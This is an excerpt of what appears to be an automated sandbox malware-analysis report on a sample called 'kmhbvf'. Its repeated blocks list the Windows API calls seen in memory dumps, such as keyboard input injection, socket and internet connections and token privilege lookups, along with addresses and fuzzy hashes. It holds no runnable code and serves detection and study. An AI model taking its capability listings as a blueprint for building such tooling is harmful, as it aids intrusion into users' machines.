                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                                  • String ID:
                                                                  • API String ID: 2782032738-0
                                                                  • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                  • Instruction ID: 1e81d031bc3da09a02a3df7f5d8bd0dc989b3e5280945b9cfcf9f102e6361bca
                                                                  • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                                                  • Instruction Fuzzy Hash: 3041D8B1700B0E9BDF188E69C8805BF77E5AF80364B24917DE659E76C0E771DE408744
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00F2A68A
                                                                  • __itow.LIBCMT ref: 00F2A6BB
                                                                    • Part of subcall function 00F2A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00F2A976
                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00F2A724
                                                                  • __itow.LIBCMT ref: 00F2A77B
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend$__itow
                                                                  • String ID:
                                                                  • API String ID: 3379773720-0
                                                                  • Opcode ID: c511180c862f38a0c115cf5c5871b4ddf5f0af22a0988fbb513ba58de885a962
                                                                  • Instruction ID: 9359651cd6999f3c1edad103bcded5b16b98437d3884242f41d5628cac7d6439
                                                                  • Opcode Fuzzy Hash: c511180c862f38a0c115cf5c5871b4ddf5f0af22a0988fbb513ba58de885a962
                                                                  • Instruction Fuzzy Hash: 9341B174A0025CABDF10EF61DC46BEE7BF9EF44760F040069F905A3291DB749984DBA2
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • socket.WSOCK32(00000002,00000002,00000011), ref: 00F470BC
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00F470CC
                                                                    • Part of subcall function 00ED4D37: __itow.LIBCMT ref: 00ED4D62
                                                                    • Part of subcall function 00ED4D37: __swprintf.LIBCMT ref: 00ED4DAC
                                                                  • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00F47130
                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 00F4713C
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorLast$__itow__swprintfsocket
                                                                  • String ID:
                                                                  • API String ID: 2214342067-0
                                                                  • Opcode ID: 5cfe46ad897f1b091cead563775883232038c51af5a7c52f5725fed27085664f
                                                                  • Instruction ID: ceae0aa576138cd5631b205d38d3a1e3603079581268c21ee7049a4dffa82813
                                                                  • Opcode Fuzzy Hash: 5cfe46ad897f1b091cead563775883232038c51af5a7c52f5725fed27085664f
                                                                  • Instruction Fuzzy Hash: 1A41CEB17002106FEB20BF24DC8AF2A77E5DB54B10F148459FA19AB3D2DBB49C029B91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00F60980), ref: 00F46B92
                                                                  • _strlen.LIBCMT ref: 00F46BC4
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: _strlen
                                                                  • String ID:
                                                                  • API String ID: 4218353326-0
                                                                  • Opcode ID: be280ddf50e526eddfc8365d5be025c004c9e873ac627926c3e2f1cc23481b4c
                                                                  • Instruction ID: 5dd8f9d3f4c37af28d706c8e0ce4bab09aa485b76f246e88f8d48e6f78d9c21d
                                                                  • Opcode Fuzzy Hash: be280ddf50e526eddfc8365d5be025c004c9e873ac627926c3e2f1cc23481b4c
                                                                  • Instruction Fuzzy Hash: 6741C071A00208AFCB14FB64DCC1EAEB7E9EF55310F148155F91AEB292EB30AD41DB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00F3BEE1
                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00F3BF07
                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00F3BF2C
                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00F3BF58
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                  • String ID:
                                                                  • API String ID: 3321077145-0
                                                                  • Opcode ID: c6135a987b2ebe4c33a6c45b7739d9e5565e0e56cb8984f52bb607a4e64920c5
                                                                  • Instruction ID: ece5d8763ffaf533bbc830610a302dbfead134ec794359e102224eb14bced9ac
                                                                  • Opcode Fuzzy Hash: c6135a987b2ebe4c33a6c45b7739d9e5565e0e56cb8984f52bb607a4e64920c5
                                                                  • Instruction Fuzzy Hash: 0F412839600A10DFCB11EF15C495A59BBF2EF59320B188489E949AB3A2CB70FD42DB91
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F58F03
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: InvalidateRect
                                                                  • String ID:
                                                                  • API String ID: 634782764-0
                                                                  • Opcode ID: 7065bf463bf42f6a5a1b8d2b8574f1c2b8f07867383b453e41daac47f76c431b
                                                                  • Instruction ID: 3f71528105b7df733ddefd517c93fe8166a81302ac74478dfcbed5542aeebd39
                                                                  • Opcode Fuzzy Hash: 7065bf463bf42f6a5a1b8d2b8574f1c2b8f07867383b453e41daac47f76c431b
                                                                  • Instruction Fuzzy Hash: 7631E535A10208FFEF209A54CC45BA937E6EB0A3A2F244502FF11F61A1CF71D95AFA51
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • ClientToScreen.USER32(?,?), ref: 00F5B1D2
                                                                  • GetWindowRect.USER32 ref: 00F5B248
                                                                  • PtInRect.USER32(?,?,00F5C6BC), ref: 00F5B258
                                                                  • MessageBeep.USER32(00000000), ref: 00F5B2C9
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                  • String ID:
                                                                  • API String ID: 1352109105-0
                                                                  • Opcode ID: 6d21e71754f2733ab369582738b4ce14f860f5f933735d3342ed1d27f1e125a2
                                                                  • Instruction ID: 4b729049301553fd9e4e02027c6616b8947b711f120cba0c1a9b3596dd994594
                                                                  • Opcode Fuzzy Hash: 6d21e71754f2733ab369582738b4ce14f860f5f933735d3342ed1d27f1e125a2
                                                                  • Instruction Fuzzy Hash: 67418130A04219DFCF12DF58C884B9D7BF5FF49312F2440A5EA189B255D730A845EF60
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00F31326
                                                                  • SetKeyboardState.USER32(00000080,?,00000001), ref: 00F31342
                                                                  • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 00F313A8
                                                                  • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 00F313FA
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                  • String ID:
                                                                  • API String ID: 432972143-0
                                                                  • Opcode ID: 95658684b10cfde20486daac8d59a7e81f21c1be8d6973ce53f6088beb5b9a52
                                                                  • Instruction ID: e67b6de7c4ccb74122ccedec775ca142ba71b1c5cf980ea1b90f4b8a92a08c4e
                                                                  • Opcode Fuzzy Hash: 95658684b10cfde20486daac8d59a7e81f21c1be8d6973ce53f6088beb5b9a52
                                                                  • Instruction Fuzzy Hash: A7313530E44208AEFF348A258C05BFEBBA9BB45330F08821AE491526D1D7788D55BBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetKeyboardState.USER32(?,749173F0,?,00008000), ref: 00F31465
                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00F31481
                                                                  • PostMessageW.USER32(00000000,00000101,00000000), ref: 00F314E0
                                                                  • SendInput.USER32(00000001,?,0000001C,749173F0,?,00008000), ref: 00F31532
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                  • String ID:
                                                                  • API String ID: 432972143-0
                                                                  • Opcode ID: 273717e6617cbafefdfd86f7fe26f4e3af7c2d8b80556eef3788177d1d2d1a52
                                                                  • Instruction ID: 5608c7fa11eefea14701c5549bfaa15d3123a8a79651fbe49694168245d0b252
                                                                  • Opcode Fuzzy Hash: 273717e6617cbafefdfd86f7fe26f4e3af7c2d8b80556eef3788177d1d2d1a52
                                                                  • Instruction Fuzzy Hash: 54310530D402185AEF34CB65DC04BBABBA5BB86330F18431AE491521D1D7798955BBA1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00F0642B
                                                                  • __isleadbyte_l.LIBCMT ref: 00F06459
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F06487
                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 00F064BD
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                  • String ID:
                                                                  • API String ID: 3058430110-0
                                                                  • Opcode ID: 09c28184d4a8956895845670971841c60b22dc69f975b39feb87266dc7365259
                                                                  • Instruction ID: 4fa7e3c7f467d1865d2f4cf1caa2bd65243ce122931a7397f1ea600c8171f6f6
                                                                  • Opcode Fuzzy Hash: 09c28184d4a8956895845670971841c60b22dc69f975b39feb87266dc7365259
                                                                  • Instruction Fuzzy Hash: CD31AE35A0025AAFDB21CF65CC44BAA7BA9BF41320F154069E864DB1D1DB31E860FB50
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetForegroundWindow.USER32 ref: 00F5553F
                                                                    • Part of subcall function 00F33B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00F33B4E
                                                                    • Part of subcall function 00F33B34: GetCurrentThreadId.KERNEL32 ref: 00F33B55
                                                                    • Part of subcall function 00F33B34: AttachThreadInput.USER32(00000000,?,00F355C0), ref: 00F33B5C
                                                                  • GetCaretPos.USER32(?), ref: 00F55550
                                                                  • ClientToScreen.USER32(00000000,?), ref: 00F5558B
                                                                  • GetForegroundWindow.USER32 ref: 00F55591
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                  • String ID:
                                                                  • API String ID: 2759813231-0
                                                                  • Opcode ID: a6df5f890412acfedc244bc979775749e174567ab311c630c6e76ddc8357253e
                                                                  • Instruction ID: 10a6dc6736fd3adb8f464bfab3a9c76a2f0a4d17956780e0531951a4c8c17d36
                                                                  • Opcode Fuzzy Hash: a6df5f890412acfedc244bc979775749e174567ab311c630c6e76ddc8357253e
                                                                  • Instruction Fuzzy Hash: 85312DB1900108AFDB00EFA5DC85DEFB7F9EF98314F10406AE915E7241EA75AE458BA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00ED29E2: GetWindowLongW.USER32(?,000000EB), ref: 00ED29F3
                                                                  • GetCursorPos.USER32(?,?,?,?,?,?,?,?,00F0BCEC,?,?,?,?,?), ref: 00F5CB7A
                                                                  • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00F0BCEC,?,?,?,?,?), ref: 00F5CB8F
                                                                  • GetCursorPos.USER32(?,?,?,?,?,?,?,?,?,00F0BCEC,?,?,?,?,?), ref: 00F5CBDC
                                                                  • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00F0BCEC,?,?,?), ref: 00F5CC16
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                                  • String ID:
                                                                  • API String ID: 2864067406-0
                                                                  • Opcode ID: b64d3468138c74eb2e630f2b7af20a345f297c829c0f265ec6bb9765406e8eb6
                                                                  • Instruction ID: 411fe2b6fdb5bc2006b27a2dbfbc6add7a69322e4c247979f3ce0c9081963ec5
                                                                  • Opcode Fuzzy Hash: b64d3468138c74eb2e630f2b7af20a345f297c829c0f265ec6bb9765406e8eb6
                                                                  • Instruction Fuzzy Hash: 9831C135A00218BFCB159F54C859EBA7BB5EB89321F144099FE0697261C7315D51FFE0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • __setmode.LIBCMT ref: 00EF0BE2
                                                                    • Part of subcall function 00EE402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F37E51,?,?,00000000), ref: 00EE4041
                                                                    • Part of subcall function 00EE402A: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F37E51,?,?,00000000,?,?), ref: 00EE4065
                                                                  • _fprintf.LIBCMT ref: 00EF0C19
                                                                  • OutputDebugStringW.KERNEL32(?), ref: 00F2694C
                                                                    • Part of subcall function 00EF4CCA: _flsall.LIBCMT ref: 00EF4CE3
                                                                  • __setmode.LIBCMT ref: 00EF0C4E
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
                                                                  • String ID:
                                                                  • API String ID: 521402451-0
                                                                  • Opcode ID: 3e77577fd853b6d1147712f2695c1049ad0765557fa167697c912eb05640b286
                                                                  • Instruction ID: cfe92822bf0354e605bf2a0c39eb789948b0be705605009d48b35791e2ec1160
                                                                  • Opcode Fuzzy Hash: 3e77577fd853b6d1147712f2695c1049ad0765557fa167697c912eb05640b286
                                                                  • Instruction Fuzzy Hash: B11127B1A0420C6ADB08B7B4AC469FFBBA9DF80320F141156F304B72C2DF75599257A1
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 00F28D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00F28D3F
                                                                    • Part of subcall function 00F28D28: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00F28D49
                                                                    • Part of subcall function 00F28D28: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F28D58
                                                                    • Part of subcall function 00F28D28: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00F28D5F
                                                                    • Part of subcall function 00F28D28: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00F28D75
                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 00F292C1
                                                                  • _memcmp.LIBCMT ref: 00F292E4
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00F2931A
                                                                  • HeapFree.KERNEL32(00000000), ref: 00F29321
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
                                                                  • String ID:
                                                                  • API String ID: 1592001646-0
                                                                  • Opcode ID: c3f73ed51a4a1e123db46274df46d2a5e3d96e5c4b34be368b5da1266825a88b
                                                                  • Instruction ID: 594bbb569bbf928b2a37cf9ceac77130f808138d9ecee3985fdc27c3244ad536
                                                                  • Opcode Fuzzy Hash: c3f73ed51a4a1e123db46274df46d2a5e3d96e5c4b34be368b5da1266825a88b
                                                                  • Instruction Fuzzy Hash: C2219A32E44119EFDF10DFA4D945BEEB7B8EF44311F144099E894AB291D7B0AE05EBA0
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F41E6F
                                                                    • Part of subcall function 00F41EF9: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F41F18
                                                                    • Part of subcall function 00F41EF9: InternetCloseHandle.WININET(00000000), ref: 00F41FB5
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256216730.0000000000F99000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_1_2_ed0000_kmhbvf.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$CloseConnectHandleOpen
                                                                  • String ID:
                                                                  • API String ID: 1463438336-0
                                                                  • Opcode ID: b43bc322c83f895966080799b34f0aaa89702af4349f083324b3b439458829e1
                                                                  • Instruction ID: fad6a680e6f4bd60f0a318e509b3f20183f6b5f777b15cfe1ad50d6dc0df5bf4
                                                                  • Opcode Fuzzy Hash: b43bc322c83f895966080799b34f0aaa89702af4349f083324b3b439458829e1
                                                                  • Instruction Fuzzy Hash: 74215E3A600609BFDB119F60CC01FBBBBAAFB84710F10451AFE5596650DBB1B851BB90
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  • GetWindowLongW.USER32(?,000000EC), ref: 00F563BD
                                                                  • SetWindowLongW.USER32 ref: 00F563D7
                                                                  • SetWindowLongW.USER32 ref: 00F563E5
                                                                  • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 00F563F3
                                                                  Memory Dump Source
                                                                  • Source File: 00000001.00000002.255973952.0000000000ED1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00ED0000, based on PE: true
                                                                  • Associated: 00000001.00000002.255965950.0000000000ED0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256145510.0000000000F60000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256190459.0000000000F86000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                  • Associated: 00000001.00000002.256202778.0000000000F90000.00000004.00000001.01000000.00000004.sdmpDownload File
